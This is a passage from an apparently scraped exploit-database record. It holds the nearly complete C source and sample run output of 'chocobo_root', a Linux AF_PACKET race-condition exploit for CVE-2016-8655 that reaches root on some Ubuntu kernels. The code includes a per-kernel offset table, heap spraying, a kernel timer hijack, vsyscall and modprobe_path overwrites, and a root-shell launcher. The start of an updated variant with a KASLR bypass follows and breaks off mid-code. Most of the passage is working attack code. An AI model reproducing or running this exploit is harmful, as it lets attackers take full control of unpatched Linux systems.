starting\r\nmaking vsyscall page writable..\r\n \r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n \r\n \r\nstage 1 completed\r\nregistering new sysctl..\r\n \r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n \r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n \r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\n[email\u00a0protected]:~# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(user)\r\n \r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n \r\nThere are offsets included for older kernels, but they're untested\r\nso be aware that this exploit will probably crash kernels older than 4.4.\r\n \r\ntested on:\r\nUbuntu 16.04: 4.4.0-51-generic\r\nUbuntu 16.04: 4.4.0-47-generic\r\nUbuntu 16.04: 4.4.0-36-generic\r\nUbuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu\r\n \r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n \r\n11/2016\r\nby rebel\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <unistd.h>\r\n#include <sys/wait.h>\r\n#include <assert.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/if_ether.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <linux/if_packet.h>\r\n#include <pthread.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <sys/syscall.h>\r\n#include <signal.h>\r\n#include <sched.h>\r\n#include <sys/utsname.h>\r\n \r\nvolatile int barrier = 1;\r\nvolatile int vers_switcher_done = 0;\r\n \r\nstruct offset {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n \r\n \r\nstruct offset *off = NULL;\r\n \r\n//99% of these offsets haven't actually been tested :)\r\n \r\nstruct offset offsets[] = {\r\n {\"4.4.0-46-generic #67~14.04.1\",0xffffffff810842f0,0xffffffff81e4b100,0xffffffff81274580,0xffffffff8106b880},\r\n {\"4.4.0-47-generic #68~14.04.1\",0,0,0,0},\r\n {\"4.2.0-41-generic #48\",0xffffffff81083470,0xffffffff81e48920,0xffffffff812775c0,0xffffffff8106c680},\r\n {\"4.8.0-22-generic #24\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b34b0,0xffffffff8106f0d0},\r\n {\"4.2.0-34-generic #39\",0xffffffff81082080,0xffffffff81c487e0,0xffffffff81274490,0xffffffff8106b5d0},\r\n {\"4.2.0-30-generic #36\",0xffffffff810820d0,0xffffffff81c487e0,0xffffffff812744e0,0xffffffff8106b620},\r\n {\"4.2.0-16-generic #19\",0xffffffff81081ac0,0xffffffff81c48680,0xffffffff812738f0,0xffffffff8106b110},\r\n {\"4.2.0-17-generic #21\",0,0,0,0},\r\n {\"4.2.0-18-generic #22\",0,0,0,0},\r\n {\"4.2.0-19-generic #23~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125de30,0xffffffff81067750},\r\n {\"4.2.0-21-generic #25~14.04.1\",0,0,0,0},\r\n {\"4.2.0-30-generic #36~14.04.1\",0xffffffff8107da40,0xffffffff81c4a8e0,0xffffffff8125dd40,0xffffffff81067b20},\r\n {\"4.2.0-27-generic #32~14.04.1\",0xffffffff8107dbe0,0xffffffff81c498c0,0xffffffff8125e420,0xffffffff81067c60},\r\n {\"4.2.0-36-generic #42\",0xffffffff81083430,0xffffffff81e488e0,0xffffffff81277380,0xffffffff8106c680},\r\n {\"4.4.0-22-generic #40\",0xffffffff81087d40,0xffffffff81e48f00,0xffffffff812864d0,0xffffffff8106f370},\r\n {\"4.2.0-18-generic #22~14.04.1\",0xffffffff8107d620,0xffffffff81c49780,0xffffffff8125dd10,0xffffffff81067760},\r\n {\"4.4.0-34-generic #53\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286ed0,0xffffffff8106f370},\r\n {\"4.2.0-22-generic #27\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273b20,0xffffffff8106b100},\r\n {\"4.2.0-23-generic #28\",0,0,0,0},\r\n {\"4.2.0-25-generic #30\",0,0,0,0},\r\n {\"4.4.0-36-generic #55\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e50,0xffffffff8106f360},\r\n {\"4.2.0-42-generic #49\",0xffffffff81083490,0xffffffff81e489a0,0xffffffff81277870,0xffffffff8106c680},\r\n {\"4.4.0-31-generic #50\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e90,0xffffffff8106f370},\r\n {\"4.4.0-22-generic #40~14.04.1\",0xffffffff81084250,0xffffffff81c4b080,0xffffffff81273de0,0xffffffff8106b9d0},\r\n {\"4.2.0-38-generic #45\",0xffffffff810833d0,0xffffffff81e488e0,0xffffffff81277410,0xffffffff8106c680},\r\n {\"4.4.0-45-generic #66\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874c0,0xffffffff8106f320},\r\n {\"4.2.0-36-generic #42~14.04.1\",0xffffffff8107ffd0,0xffffffff81c499e0,0xffffffff81261ea0,0xffffffff81069d00},\r\n {\"4.4.0-45-generic #66~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274340,0xffffffff8106b880},\r\n {\"4.2.0-22-generic #27~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125deb0,0xffffffff81067750},\r\n {\"4.2.0-25-generic #30~14.04.1\",0,0,0,0},\r\n {\"4.2.0-23-generic #28~14.04.1\",0,0,0,0},\r\n {\"4.4.0-46-generic #67\",0xffffffff81088040,0xffffffff81e48f80,0xffffffff81287800,0xffffffff8106f320},\r\n {\"4.4.0-47-generic #68\",0,0,0,0},\r\n {\"4.4.0-34-generic #53~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c40,0xffffffff8106b880},\r\n {\"4.4.0-36-generic #55~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c60,0xffffffff8106b890},\r\n {\"4.4.0-31-generic #50~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c20,0xffffffff8106b880},\r\n {\"4.2.0-38-generic #45~14.04.1\",0xffffffff8107fdc0,0xffffffff81c4a9e0,0xffffffff81261540,0xffffffff81069bf0},\r\n {\"4.2.0-35-generic #40\",0xffffffff81083430,0xffffffff81e48860,0xffffffff81277240,0xffffffff8106c680},\r\n {\"4.4.0-24-generic #43~14.04.1\",0xffffffff81084120,0xffffffff81c4b080,0xffffffff812736f0,0xffffffff8106b880},\r\n {\"4.4.0-21-generic #37\",0xffffffff81087cf0,0xffffffff81e48e80,0xffffffff81286310,0xffffffff8106f370},\r\n {\"4.2.0-34-generic #39~14.04.1\",0xffffffff8107dc50,0xffffffff81c498e0,0xffffffff8125e830,0xffffffff81067c90},\r\n {\"4.4.0-24-generic #43\",0xffffffff81087e60,0xffffffff81e48f00,0xffffffff812868f0,0xffffffff8106f370},\r\n {\"4.4.0-21-generic #37~14.04.1\",0xffffffff81084220,0xffffffff81c4b000,0xffffffff81273a30,0xffffffff8106b9d0},\r\n {\"4.2.0-41-generic #48~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aa20,0xffffffff812616c0,0xffffffff81069bf0},\r\n {\"4.8.0-27-generic #29\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b3490,0xffffffff8106f0d0},\r\n {\"4.8.0-26-generic #28\",0,0,0,0},\r\n {\"4.4.0-38-generic #57\",0xffffffff81087f70,0xffffffff81e48f80,0xffffffff81287470,0xffffffff8106f360},\r\n {\"4.4.0-42-generic #62~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274300,0xffffffff8106b880},\r\n {\"4.4.0-38-generic #57~14.04.1\",0xffffffff81084210,0xffffffff81e4b100,0xffffffff812742e0,0xffffffff8106b890},\r\n {\"4.4.0-49-generic #70\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff81287d40,0xffffffff8106f320},\r\n {\"4.4.0-49-generic #70~14.04.1\",0xffffffff81084350,0xffffffff81e4b100,0xffffffff81274b10,0xffffffff8106b880},\r\n {\"4.2.0-21-generic #25\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273aa0,0xffffffff8106b100},\r\n {\"4.2.0-19-generic #23\",0,0,0,0},\r\n {\"4.2.0-42-generic #49~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aaa0,0xffffffff81261980,0xffffffff81069bf0},\r\n {\"4.4.0-43-generic #63\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874b0,0xffffffff8106f320},\r\n {\"4.4.0-28-generic #47\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286df0,0xffffffff8106f370},\r\n {\"4.4.0-28-generic #47~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273b70,0xffffffff8106b880},\r\n {\"4.9.0-1-generic #2\",0xffffffff8108bbe0,0xffffffff81e4ac20,0xffffffff812b8400,0xffffffff8106f390},\r\n {\"4.8.0-28-generic #30\",0xffffffff8108ae10,0xffffffff81e48b80,0xffffffff812b3690,0xffffffff8106f0e0},\r\n {\"4.2.0-35-generic #40~14.04.1\",0xffffffff8107fff0,0xffffffff81c49960,0xffffffff81262320,0xffffffff81069d20},\r\n {\"4.2.0-27-generic #32\",0xffffffff810820c0,0xffffffff81c487c0,0xffffffff81274150,0xffffffff8106b620},\r\n {\"4.4.0-42-generic #62\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874a0,0xffffffff8106f320},\r\n {\"4.4.0-51-generic #72\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff812879a0,0xffffffff8106f320},\r\n//{\"4.8.6-300.fc25.x86_64 #1 SMP Tue Nov 1 12:36:38 UTC 2016\",0xffffffff9f0a8b30,0xffffffff9fe40940,0xffffffff9f2cfbf0,0xffffffff9f0663b0},\r\n {NULL,0,0,0,0}\r\n};\r\n \r\n#define VSYSCALL 0xffffffffff600000\r\n \r\n#define PAD 64\r\n \r\nint pad_fds[PAD];\r\n \r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n \r\n#define CONF_RING_FRAMES 1\r\n \r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n \r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n \r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while(barrier) {\r\n }\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\r\n \r\n return NULL;\r\n}\r\n \r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n \r\n while(barrier) {}\r\n \r\n while(1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n y++;\r\n \r\n if(x != 0) break;\r\n \r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n if(x != 0) break;\r\n \r\n y++;\r\n }\r\n \r\n fprintf(stderr,\"version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n \r\n \r\n return NULL;\r\n}\r\n \r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n \r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\",\"wtf\",exploitbuf,BUFSIZE-24,-2);\r\n}\r\n \r\n \r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n \r\n for(x=0; x<PAD; x++)\r\n if(socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP)) == -1) {\r\n fprintf(stderr,\"pad_kmalloc() socket error\\n\");\r\n exit(1);\r\n }\r\n \r\n}\r\n \r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n \r\n sigemptyset(&set);\r\n \r\n sigaddset(&set, SIGSEGV);\r\n \r\n if(pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n \r\n fprintf(stderr,\"new exploit attempt starting, jumping to %p, arg=%p\\n\",(void *)func,(void *)arg);\r\n \r\n pad_kmalloc();\r\n \r\n fd=socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP));\r\n \r\n if (fd==-1) {\r\n printf(\"target socket error\\n\");\r\n exit(1);\r\n }\r\n \r\n pad_kmalloc();\r\n \r\n fprintf(stderr,\"sockets allocated\\n\");\r\n \r\n val = TPACKET_V3;\r\n \r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n \r\n//try to set the timeout to 10 seconds\r\n//the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n \r\n sfd = fd;\r\n \r\n if(pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n fprintf(stderr, \"Error creating thread\\n\");\r\n return 1;\r\n }\r\n \r\n \r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n \r\n usleep(200000);\r\n \r\n fprintf(stderr,\"removing barrier and spraying..\\n\");\r\n \r\n memset(exploitbuf,'\\x00',BUFSIZE);\r\n \r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n \r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n \r\n \r\n barrier = 0;\r\n \r\n usleep(100000);\r\n \r\n while(!vers_switcher_done)usleep(100000);\r\n \r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n \r\n fprintf(stderr,\"current packet version = %d\\n\",val);\r\n \r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n \r\n \r\n if(pbd == MAP_FAILED) {\r\n fprintf(stderr,\"could not map pbd\\n\");\r\n exit(1);\r\n }\r\n \r\n else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n fprintf(stderr,\"pbd->hdr.bh1.offset_to_first_pkt = %d\\n\",off);\r\n }\r\n \r\n \r\n if(val == TPACKET_V1 && off != 0) {\r\n fprintf(stderr,\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n }\r\n \r\n else {\r\n fprintf(stderr,\"race not won\\n\");\r\n exit(2);\r\n }\r\n \r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n \r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n \r\n fprintf(stderr,\"please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\\n\");\r\n sleep(1);\r\n fprintf(stderr,\"closing socket and verifying..\");\r\n \r\n close(sfd);\r\n \r\n kmalloc();\r\n \r\n fprintf(stderr,\"all messages sent\\n\");\r\n \r\n sleep(31337);\r\n exit(1);\r\n}\r\n \r\n \r\nint verification_result = 0;\r\n \r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n \r\n \r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n \r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n \r\n if(pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n \r\n signal(SIGSEGV, catch_sigsegv);\r\n \r\n *vsyscall = 0xdeadbeef+x;\r\n \r\n if(*vsyscall == 0xdeadbeef+x) {\r\n fprintf(stderr,\"\\nvsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n \r\n return NULL;\r\n}\r\n \r\nvoid verify_stage1(void)\r\n{\r\n int x;\r\n pthread_t v_thread;\r\n \r\n sleep(5);\r\n \r\n for(x=0; x<300; x++) {\r\n \r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n \r\n pthread_join(v_thread, NULL);\r\n \r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n \r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n \r\n printf(\"could not modify vsyscall\\n\");\r\n \r\n exit(1);\r\n}\r\n \r\nvoid verify_stage2(void)\r\n{\r\n int x;\r\n struct stat b;\r\n \r\n sleep(5);\r\n \r\n for(x=0; x<300; x++) {\r\n \r\n if(stat(\"/proc/sys/hack\",&b) == 0) {\r\n fprintf(stderr,\"\\nsysctl added!\\n\");\r\n exit(0);\r\n }\r\n \r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n \r\n printf(\"could not add sysctl\\n\");\r\n exit(1);\r\n \r\n \r\n}\r\n \r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n \r\nretry:\r\n \r\n pid = fork();\r\n \r\n if(pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n \r\n wait(&status);\r\n \r\n printf(\"\\n\");\r\n \r\n if(WEXITSTATUS(status) == 2) {\r\n printf(\"retrying stage..\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n \r\n else if(WEXITSTATUS(status) != 0) {\r\n printf(\"something bad happened, aborting exploit attempt\\n\");\r\n exit(-1);\r\n }\r\n \r\n \r\n \r\n kill(pid, 9);\r\n}\r\n \r\n \r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n \r\n fprintf(stderr,\"exploit starting\\n\");\r\n printf(\"making vsyscall page writable..\\n\\n\");\r\n \r\n exploit(off->set_memory_rw, VSYSCALL, verify_stage1);\r\n \r\n printf(\"\\nstage 1 completed\\n\");\r\n \r\n sleep(5);\r\n \r\n printf(\"registering new sysctl..\\n\\n\");\r\n \r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n \r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n \r\n strcpy((char *)(VSYSCALL+0xf00),\"hack\");\r\n memcpy((char *)(VSYSCALL+0xe00),\"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void *)(off->proc_dostring);\r\n c->data = (void *)(off->modprobe_path);\r\n c->maxlen=256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n \r\n exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);\r\n \r\n printf(\"stage 2 completed\\n\");\r\n}\r\n \r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n \r\n \r\n fd = open(\"/proc/sys/hack\",O_WRONLY);\r\n \r\n if(fd == -1) {\r\n fprintf(stderr,\"could not open /proc/sys/hack\\n\");\r\n exit(-1);\r\n }\r\n \r\n memset(buf,'\\x00', 256);\r\n \r\n readlink(\"/proc/self/exe\",(char *)&buf,256);\r\n \r\n write(fd,buf,strlen(buf)+1);\r\n \r\n socket(AF_INET,SOCK_STREAM,132);\r\n \r\n if(stat(buf,&s) == 0 && s.st_uid == 0) {\r\n printf(\"binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd,\"/sbin/modprobe\",15);\r\n close(fd);\r\n execl(buf,buf,NULL);\r\n }\r\n \r\n else\r\n printf(\"could not create rootshell\\n\");\r\n \r\n \r\n}\r\n \r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n int i, crash = 0;\r\n char buf[512], *f;\r\n \r\n \r\n if(argc == 2 && !strcmp(argv[1],\"crash\")) {\r\n crash = 1;\r\n }\r\n \r\n \r\n if(getuid() == 0 && geteuid() == 0 && !crash) {\r\n chown(\"/proc/self/exe\",0,0);\r\n chmod(\"/proc/self/exe\",06755);\r\n exit(-1);\r\n }\r\n \r\n else if(getuid() != 0 && geteuid() == 0 && !crash) {\r\n setresuid(0,0,0);\r\n setresgid(0,0,0);\r\n execl(\"/bin/bash\",\"bash\",\"-p\",NULL);\r\n exit(0);\r\n }\r\n \r\n fprintf(stderr,\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n \r\n uname(&u);\r\n \r\n if((f = strstr(u.version,\"-Ubuntu\")) != NULL) *f = '\\0';\r\n \r\n snprintf(buf,512,\"%s %s\",u.release,u.version);\r\n \r\n printf(\"kernel version: %s\\n\",buf);\r\n \r\n \r\n for(i=0; offsets[i].kernel_version != NULL; i++) {\r\n if(!strcmp(offsets[i].kernel_version,buf)) {\r\n \r\n while(offsets[i].proc_dostring == 0)\r\n i--;\r\n \r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n \r\n if(crash) {\r\n off = &offsets[0];\r\n off->set_memory_rw = 0xffffffff41414141;\r\n }\r\n \r\n if(off) {\r\n printf(\"proc_dostring = %p\\n\",(void *)off->proc_dostring);\r\n printf(\"modprobe_path = %p\\n\",(void *)off->modprobe_path);\r\n printf(\"register_sysctl_table = %p\\n\",(void *)off->register_sysctl_table);\r\n printf(\"set_memory_rw = %p\\n\",(void *)off->set_memory_rw);\r\n }\r\n \r\n if(!off) {\r\n fprintf(stderr,\"i have no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n \r\n pid = fork();\r\n \r\n if(pid == 0) {\r\n if(unshare(CLONE_NEWUSER) != 0)\r\n fprintf(stderr, \"failed to create new user namespace\\n\");\r\n \r\n if(unshare(CLONE_NEWNET) != 0)\r\n fprintf(stderr, \"failed to create new network namespace\\n\");\r\n \r\n wrapper();\r\n exit(0);\r\n }\r\n \r\n waitpid(pid, &status, 0);\r\n \r\n launch_rootshell();\r\n return 0;\r\n}\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/26493", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-12-04T23:55:49", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-07-26T00:00:00", "title": "Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) AF_PACKET Race Condition Privilege", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2019-07-26T00:00:00", "id": "1337DAY-ID-33037", "href": "https://0day.today/exploit/description/33037", "sourceData": "/*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit for CVE-2016-8655.\r\nIncludes KASLR and SMEP/SMAP bypasses.\r\nFor Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.\r\nAll kernel offsets have been tested on Ubuntu / Linux Mint.\r\n\r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n[email\u00a0protected]:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n[email\u00a0protected]:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\n[email\u00a0protected]:~$ gcc chocobo_root.c -o chocobo_root -lpthread\r\n[email\u00a0protected]:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit starting\r\nmaking vsyscall page writable..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n\r\n\r\nstage 1 completed\r\nregistering new sysctl..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n\r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n\r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\n[email\u00a0protected]:~# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(user)\r\n\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n\r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n\r\n11/2016\r\nby rebel\r\n---\r\nUpdated by <[email\u00a0protected]>\r\n- check number of CPU cores\r\n- KASLR bypasses\r\n- additional kernel targets\r\nhttps://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include <pthread.h>\r\n#include <sched.h>\r\n#include <signal.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <sys/syscall.h>\r\n#include <sys/sysinfo.h>\r\n#include <sys/utsname.h>\r\n#include <sys/wait.h>\r\n\r\n#include <arpa/inet.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <netinet/if_ether.h>\r\n\r\n#define DEBUG\r\n\r\n#ifdef DEBUG\r\n# define dprintf printf\r\n#else\r\n# define dprintf\r\n#endif\r\n\r\n#define ENABLE_KASLR_BYPASS 1\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS\r\nunsigned long KERNEL_BASE = 0xffffffff81000000ul;\r\n\r\n// Will be overwritten by detect_versions()\r\nint kernel = -1;\r\n\r\n// New sysctl path\r\nconst char *SYSCTL_NAME = \"hack\";\r\nconst char *SYSCTL_PATH = \"/proc/sys/hack\";\r\n\r\nvolatile int barrier = 